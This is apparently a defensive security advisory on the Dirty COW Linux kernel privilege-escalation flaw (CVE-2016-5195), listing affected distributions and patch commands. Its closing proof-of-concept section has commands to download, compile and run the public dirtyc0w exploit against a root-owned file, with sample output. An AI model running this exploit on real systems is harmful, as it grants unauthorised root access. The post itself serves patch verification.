CVE-2016-5195 – Dirty Cow Vulnerability

Overview

The dirty cow is a new high profile privilege escalation vulnerability in Linux. The latest in a series of branded bugs such as Heartbleed, Ghost and ShellShock. In this post I’ll give more details about this vulnerability and how to mitigate the risk of your systems.

Present in Linux kernel versions 2.6.22 and higher, the issue has existed since 2007. After a discovery by a security researcher named Phil Oester, it was fixed on Oct 18, 2016. Which means that there’s a high probability that your Linux running devices are vulnerable.

Description

The description from Redhat’s CVE:

“A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.”

First, an attacker gains access to the machine. Second,  the attacker will run a publicly available exploit (several exist). A successful attack will result in the attacker gaining root privileges. This attack will not be logged, therefore will pass undetected.

Patches are available to most Linux distros.

Vulnerable Linux distros (Common):

Your first concern should be to mitigate the bug in your servers. Which probably have the most users and application packages. But you should also attend to network appliances and less common Linux distros such as CoreOS.

1. Red Hat Enterprise Linux 7.x
2. Red Hat Enterprise Linux 6.x
3. Red Hat Enterprise Linux 5.x
4. CentOS Linux 7.x
5. CentOS Linux 6.x
6. CentOS Linux 5.x
7. Debian Linux wheezy
8. Debian Linux jessie
9. Debian Linux stretch
10. Debian Linux sid
11. Ubuntu Linux precise (LTS 12.04)
12. Ubuntu Linux trusty
13. Ubuntu Linux xenial (LTS 16.04)
14. Ubuntu Linux yakkety
15. Ubuntu Linux vivid/ubuntu-core
16. SUSE Linux Enterprise 11 and 12.
17. Amazon Linux AMI

Testing for a vulnerable kernel

Run the following command according to your distro:

$ uname -a

$ uname -mrs

Sample output:

Linux 3.13.0-95-generic x86_64

Fixing the issue

-Debian or Ubuntu Linux

$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade

$ sudo reboot

-RHEL / CentOS Linux 5.x/6.x/7.x

Red Hat is releasing the patches to the various versions gradually without supplying a deadline.|
For the updated info please refer to: https://access.redhat.com/security/vulnerabilities/2706661.

$ sudo yum update

$ sudo reboot

-Suse Enterprise Linux or OpenSuse Linux

To apply all needed patches to the system type:

# zypper patch

# reboot

-Amazon Linux AMI

The patched kernel’s version is: “kernel-4.4.23-31.54.amzn1.x86_64”.
To update the kernel:

# sudo yum update kernel

# reboot

Proof of Concept exploit

The POC will assist you to determine whether a less common Linux is vulnerable/patched:

• Download:

$ wget

https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

•  Create a target file as root:

$ sudo -s

# echo this is not a test > foo

•  Run the PoC as normal user:

$ gcc -lpthread dirtyc0w.c -o dirtyc0w

$ ./dirtyc0w foo m00000000000000000

mmap 56123000

madvise 0

procselfmem 1800000000

$ cat foo

M00000000000000000

Editors note: 

I updated the post to include Amazon Linux AMI and the latest info from Red Hat.

References:

1. https://access.redhat.com/security/cve/cve-2016-5195
2. https://www.exploit-db.com/exploits/40611/
3. https://arstechnica.com/security/2016/10/most-serious-linux-privilege-escalation-bug-ever-is-under-active-exploit/